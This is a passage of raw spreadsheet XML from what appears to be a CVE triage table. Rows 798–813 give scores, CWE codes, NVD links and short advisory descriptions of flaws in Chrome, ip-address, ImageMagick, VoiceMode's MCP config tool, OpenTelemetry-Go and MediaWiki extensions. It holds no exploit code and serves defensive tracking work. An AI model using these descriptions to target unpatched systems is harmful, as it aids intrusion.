          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G798" s="5" t="inlineStr"/>
      <c r="H798" s="5" t="inlineStr"/>
      <c r="I798" s="5" t="inlineStr"/>
      <c r="J798" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K798" s="5" t="inlineStr"/>
      <c r="L798" s="5" t="inlineStr"/>
      <c r="M798" s="5" t="inlineStr"/>
      <c r="N798" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O798" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P798" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q798" s="5" t="inlineStr"/>
      <c r="R798" s="5" t="inlineStr">
        <is>
          <t>CWE-754</t>
        </is>
      </c>
      <c r="S798" s="5" t="inlineStr">
        <is>
          <t>Improper state validation in Downloads in Google Chrome prior to 154.0.8037.57 allowed a remote attacker to bypass system access restrictions via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="T798" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-95330</t>
        </is>
      </c>
    </row>
    <row r="799">
      <c r="A799" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B799" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C799" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-95366</t>
        </is>
      </c>
      <c r="D799" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E799" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F799" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G799" s="5" t="inlineStr"/>
      <c r="H799" s="5" t="inlineStr"/>
      <c r="I799" s="5" t="inlineStr"/>
      <c r="J799" s="5" t="inlineStr">
        <is>
          <t>go, gin</t>
        </is>
      </c>
      <c r="K799" s="5" t="inlineStr"/>
      <c r="L799" s="5" t="inlineStr"/>
      <c r="M799" s="5" t="inlineStr"/>
      <c r="N799" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O799" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P799" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q799" s="5" t="inlineStr"/>
      <c r="R799" s="5" t="inlineStr">
        <is>
          <t>CWE-672</t>
        </is>
      </c>
      <c r="S799" s="5" t="inlineStr">
        <is>
          <t>Use of released resource in Core in Google Chrome prior to 154.0.8037.57 allowed a remote attacker who had compromised the renderer process to bypass web origin policy via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="T799" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-95366</t>
        </is>
      </c>
    </row>
    <row r="800">
      <c r="A800" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B800" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS vector changed</t>
        </is>
      </c>
      <c r="C800" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101911</t>
        </is>
      </c>
      <c r="D800" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E800" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F800" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G800" s="5" t="inlineStr"/>
      <c r="H800" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I800" s="5" t="inlineStr"/>
      <c r="J800" s="5" t="inlineStr"/>
      <c r="K800" s="5" t="inlineStr"/>
      <c r="L800" s="5" t="inlineStr"/>
      <c r="M800" s="5" t="inlineStr"/>
      <c r="N800" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O800" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P800" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q800" s="5" t="inlineStr"/>
      <c r="R800" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="S800" s="5" t="inlineStr">
        <is>
          <t>ip-address is a library for parsing and manipulating IPv4 and IPv6 addresses in JavaScript. Prior to 10.7.1, the Address6 constructor, Address6.isValid, and parse code in src/ipv6.ts accept unbounded strings and expand invalid characters through RE_BAD_CHARACTERS into large diagnostics. Material impact occurs only when an application accepts a very large attacker-controlled field and passes it to Address6 parsing without an earlier length bound. Common URL and header limits, and common body-parser defaults, generally constrain the effect; common defaults typically exclude 32 MiB fields. Megabyte-scale fields can cause a synchronous stall and high transient memory use, approximately 16 MiB can trigger an invalid string length exception, and process termination occurs at approximately 32 MiB. The affected entry points include Address6.isValid and construction paths that reach parse. This issue is fixed in version 10.7.1.</t>
        </is>
      </c>
      <c r="T800" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101911</t>
        </is>
      </c>
    </row>
    <row r="801">
      <c r="A801" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B801" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS vector changed</t>
        </is>
      </c>
      <c r="C801" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101912</t>
        </is>
      </c>
      <c r="D801" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E801" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F801" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G801" s="5" t="inlineStr"/>
      <c r="H801" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I801" s="5" t="inlineStr"/>
      <c r="J801" s="5" t="inlineStr"/>
      <c r="K801" s="5" t="inlineStr"/>
      <c r="L801" s="5" t="inlineStr"/>
      <c r="M801" s="5" t="inlineStr"/>
      <c r="N801" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O801" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P801" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q801" s="5" t="inlineStr"/>
      <c r="R801" s="5" t="inlineStr">
        <is>
          <t>CWE-697, CWE-843</t>
        </is>
      </c>
      <c r="S801" s="5" t="inlineStr">
        <is>
          <t>ip-address is a library for parsing and manipulating IPv4 and IPv6 addresses in JavaScript. Prior to 10.7.1, the isInSubnet and isHostInSubnet methods in src/common.ts compare masked binary strings without validating that both operands use the same IP family. A cross-family containment check whose leading address bits match makes the masked strings compare equal even though IPv4 and IPv6 do not share an address space. An allowlist or denylist decision can therefore classify an address outside the intended range as contained. This issue is fixed in version 10.7.1.</t>
        </is>
      </c>
      <c r="T801" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101912</t>
        </is>
      </c>
    </row>
    <row r="802">
      <c r="A802" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B802" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (3.7 → 6.3)</t>
        </is>
      </c>
      <c r="C802" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102635</t>
        </is>
      </c>
      <c r="D802" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E802" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F802" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G802" s="5" t="inlineStr"/>
      <c r="H802" s="5" t="inlineStr"/>
      <c r="I802" s="5" t="inlineStr"/>
      <c r="J802" s="5" t="inlineStr"/>
      <c r="K802" s="5" t="inlineStr"/>
      <c r="L802" s="5" t="inlineStr"/>
      <c r="M802" s="5" t="inlineStr"/>
      <c r="N802" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O802" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P802" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q802" s="5" t="inlineStr"/>
      <c r="R802" s="5" t="inlineStr">
        <is>
          <t>CWE-908</t>
        </is>
      </c>
      <c r="S802" s="5" t="inlineStr">
        <is>
          <t>ImageMagick versions before 7.1.2-32 and 6.9.13-57 contain uninitialized heap memory disclosure in the GIF decoder's application extension handler in coders/gif.c. Attackers can craft malicious GIF files that cause the number parser to read uninitialized heap memory and store contents as image metadata, disclosing sensitive heap information.</t>
        </is>
      </c>
      <c r="T802" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102635</t>
        </is>
      </c>
    </row>
    <row r="803">
      <c r="A803" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B803" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C803" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79535</t>
        </is>
      </c>
      <c r="D803" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E803" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F803" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G803" s="5" t="inlineStr"/>
      <c r="H803" s="5" t="inlineStr"/>
      <c r="I803" s="5" t="inlineStr"/>
      <c r="J803" s="5" t="inlineStr"/>
      <c r="K803" s="5" t="inlineStr"/>
      <c r="L803" s="5" t="inlineStr"/>
      <c r="M803" s="5" t="inlineStr"/>
      <c r="N803" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O803" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P803" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q803" s="5" t="inlineStr"/>
      <c r="R803" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S803" s="5" t="inlineStr">
        <is>
          <t>mbailey VoiceMode &lt;= 8.10.1 is vulnerable to OS Command Injection. The update_config MCP tool (and the "voicemode config set" CLI) writes a caller-supplied value into ~/.voicemode/voicemode.env without shell-safe escaping.</t>
        </is>
      </c>
      <c r="T803" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79535</t>
        </is>
      </c>
    </row>
    <row r="804">
      <c r="A804" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B804" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C804" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81872</t>
        </is>
      </c>
      <c r="D804" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E804" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F804" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G804" s="5" t="inlineStr"/>
      <c r="H804" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I804" s="5" t="inlineStr"/>
      <c r="J804" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K804" s="5" t="inlineStr"/>
      <c r="L804" s="5" t="inlineStr"/>
      <c r="M804" s="5" t="inlineStr"/>
      <c r="N804" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O804" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P804" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q804" s="5" t="inlineStr"/>
      <c r="R804" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-834</t>
        </is>
      </c>
      <c r="S804" s="5" t="inlineStr">
        <is>
          <t>OpenTelemetry-Go is the Go implementation of OpenTelemetry. Prior to version 0.21.0, the go.opentelemetry.io/otel/sdk/log BatchingProcessor can enter a tight CPU loop when attacker-driven log emission fills its asynchronous export buffer while the exporter is backpressured. NewBatchingProcessor wraps the exporter with newBufferExporter(exporter, 1), and the poll loop calls queue.TryDequeue and bufferExporter.EnqueueExport before immediately signaling pollTrigger whenever the queue remains at or above batchSize. Because a failed nonblocking EnqueueExport leaves the queue length unchanged, the processor repeatedly retries without waiting for its ticker, exhausting CPU and degrading or denying service in the embedding process. This issue is fixed in version 0.21.0.</t>
        </is>
      </c>
      <c r="T804" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81872</t>
        </is>
      </c>
    </row>
    <row r="805">
      <c r="A805" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B805" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C805" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-95375</t>
        </is>
      </c>
      <c r="D805" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E805" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F805" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G805" s="5" t="inlineStr"/>
      <c r="H805" s="5" t="inlineStr"/>
      <c r="I805" s="5" t="inlineStr"/>
      <c r="J805" s="5" t="inlineStr">
        <is>
          <t>go, gin</t>
        </is>
      </c>
      <c r="K805" s="5" t="inlineStr"/>
      <c r="L805" s="5" t="inlineStr"/>
      <c r="M805" s="5" t="inlineStr"/>
      <c r="N805" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O805" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P805" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q805" s="5" t="inlineStr"/>
      <c r="R805" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S805" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in BrowserTag in Google Chrome prior to 154.0.8037.57 allowed a remote attacker who had compromised the renderer process to bypass web origin policy via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="T805" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-95375</t>
        </is>
      </c>
    </row>
    <row r="806">
      <c r="A806" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B806" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C806" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100238</t>
        </is>
      </c>
      <c r="D806" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E806" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F806" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G806" s="5" t="inlineStr"/>
      <c r="H806" s="5" t="inlineStr"/>
      <c r="I806" s="5" t="inlineStr"/>
      <c r="J806" s="5" t="inlineStr"/>
      <c r="K806" s="5" t="inlineStr"/>
      <c r="L806" s="5" t="inlineStr"/>
      <c r="M806" s="5" t="inlineStr"/>
      <c r="N806" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O806" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P806" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q806" s="5" t="inlineStr"/>
      <c r="R806" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S806" s="5" t="inlineStr">
        <is>
          <t>Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Wikimedia Foundation Mediawiki - Flow Extension allows Stored XSS.
This issue affects Mediawiki - Flow Extension: from * before 1.46.1, 1.45.5, 1.43.10.</t>
        </is>
      </c>
      <c r="T806" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100238</t>
        </is>
      </c>
    </row>
    <row r="807">
      <c r="A807" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B807" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C807" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100243</t>
        </is>
      </c>
      <c r="D807" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E807" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F807" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G807" s="5" t="inlineStr"/>
      <c r="H807" s="5" t="inlineStr"/>
      <c r="I807" s="5" t="inlineStr"/>
      <c r="J807" s="5" t="inlineStr"/>
      <c r="K807" s="5" t="inlineStr"/>
      <c r="L807" s="5" t="inlineStr"/>
      <c r="M807" s="5" t="inlineStr"/>
      <c r="N807" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O807" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P807" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q807" s="5" t="inlineStr"/>
      <c r="R807" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S807" s="5" t="inlineStr">
        <is>
          <t>Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Wikimedia Foundation Mediawiki - WikiSEO Extension allows Stored XSS.
This issue affects Mediawiki - WikiSEO Extension: from * before 1.46.1, 1.45.5, 1.43.10.</t>
        </is>
      </c>
      <c r="T807" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100243</t>
        </is>
      </c>
    </row>
    <row r="808">
      <c r="A808" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B808" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C808" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100245</t>
        </is>
      </c>
      <c r="D808" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E808" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F808" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G808" s="5" t="inlineStr"/>
      <c r="H808" s="5" t="inlineStr"/>
      <c r="I808" s="5" t="inlineStr"/>
      <c r="J808" s="5" t="inlineStr"/>
      <c r="K808" s="5" t="inlineStr"/>
      <c r="L808" s="5" t="inlineStr"/>
      <c r="M808" s="5" t="inlineStr"/>
      <c r="N808" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O808" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P808" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q808" s="5" t="inlineStr"/>
      <c r="R808" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S808" s="5" t="inlineStr">
        <is>
          <t>Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Wikimedia Foundation Mediawiki - Wikibase Extension allows Stored XSS.
This issue affects Mediawiki - Wikibase Extension: from * before 1.46.1, 1.45.5, 1.43.10.</t>
        </is>
      </c>
      <c r="T808" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100245</t>
        </is>
      </c>
    </row>
    <row r="809">
      <c r="A809" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B809" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C809" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102329</t>
        </is>
      </c>
      <c r="D809" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E809" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F809" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G809" s="5" t="inlineStr"/>
      <c r="H809" s="5" t="inlineStr"/>
      <c r="I809" s="5" t="inlineStr"/>
      <c r="J809" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K809" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L809" s="5" t="inlineStr"/>
      <c r="M809" s="5" t="inlineStr"/>
      <c r="N809" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O809" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P809" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q809" s="5" t="inlineStr"/>
      <c r="R809" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S809" s="5" t="inlineStr">
        <is>
          <t>Cross-site scripting in WebUI in Google Chrome prior to 154.0.8037.92 allowed a remote attacker to bypass web origin policy into a privileged page via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="T809" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102329</t>
        </is>
      </c>
    </row>
    <row r="810">
      <c r="A810" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B810" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C810" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103045</t>
        </is>
      </c>
      <c r="D810" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E810" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F810" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G810" s="5" t="inlineStr"/>
      <c r="H810" s="5" t="inlineStr"/>
      <c r="I810" s="5" t="inlineStr"/>
      <c r="J810" s="5" t="inlineStr"/>
      <c r="K810" s="5" t="inlineStr"/>
      <c r="L810" s="5" t="inlineStr"/>
      <c r="M810" s="5" t="inlineStr"/>
      <c r="N810" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O810" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P810" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q810" s="5" t="inlineStr"/>
      <c r="R810" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S810" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of input during web page generation ('cross-site scripting') vulnerability in The Wikimedia Foundation Mediawiki - Refreshed skin allows Stored XSS.
This issue affects Mediawiki - Refreshed skin: before 1.46.1, 1.45.5, 1.43.10.</t>
        </is>
      </c>
      <c r="T810" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103045</t>
        </is>
      </c>
    </row>
    <row r="811">
      <c r="A811" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B811" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C811" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103046</t>
        </is>
      </c>
      <c r="D811" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E811" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F811" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G811" s="5" t="inlineStr"/>
      <c r="H811" s="5" t="inlineStr"/>
      <c r="I811" s="5" t="inlineStr"/>
      <c r="J811" s="5" t="inlineStr"/>
      <c r="K811" s="5" t="inlineStr"/>
      <c r="L811" s="5" t="inlineStr"/>
      <c r="M811" s="5" t="inlineStr"/>
      <c r="N811" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O811" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P811" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q811" s="5" t="inlineStr"/>
      <c r="R811" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S811" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of input during web page generation ('cross-site scripting') vulnerability in Wikimedia Foundation MediaWiki - WikiLambda extension allows Stored XSS.
This issue affects MediaWiki - WikiLambda extension: before 1.46.1.</t>
        </is>
      </c>
      <c r="T811" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103046</t>
        </is>
      </c>
    </row>
    <row r="812">
      <c r="A812" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B812" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C812" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103047</t>
        </is>
      </c>
      <c r="D812" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E812" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F812" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G812" s="5" t="inlineStr"/>
      <c r="H812" s="5" t="inlineStr"/>
      <c r="I812" s="5" t="inlineStr"/>
      <c r="J812" s="5" t="inlineStr"/>
      <c r="K812" s="5" t="inlineStr"/>
      <c r="L812" s="5" t="inlineStr"/>
      <c r="M812" s="5" t="inlineStr"/>
      <c r="N812" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O812" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P812" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q812" s="5" t="inlineStr"/>
      <c r="R812" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S812" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of input during web page generation ('cross-site scripting') vulnerability in The Wikimedia Foundation Mediawiki - CentralAuth extension allows Stored XSS.
This issue affects Mediawiki - CentralAuth extension: before 1.46.1, 1.45.5, 1.43.10.</t>
        </is>
      </c>
      <c r="T812" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103047</t>
        </is>
      </c>
    </row>
    <row r="813">
      <c r="A813" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B813" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C813" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103049</t>
        </is>
      </c>
      <c r="D813" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E813" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F813" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G813" s="5" t="inlineStr"/>
      <c r="H813" s="5" t="inlineStr"/>
      <c r="I813" s="5" t="inlineStr"/>
      <c r="J813" s="5" t="inlineStr">
        <is>
          <t>go, cargo</t>
        </is>
      </c>
      <c r="K813" s="5" t="inlineStr"/>
      <c r="L813" s="5" t="inlineStr"/>
      <c r="M813" s="5" t="inlineStr"/>
      <c r="N813" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O813" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P813" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q813" s="5" t="inlineStr"/>
      <c r="R813" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S813" s="5" t="inlineStr">
        <is>
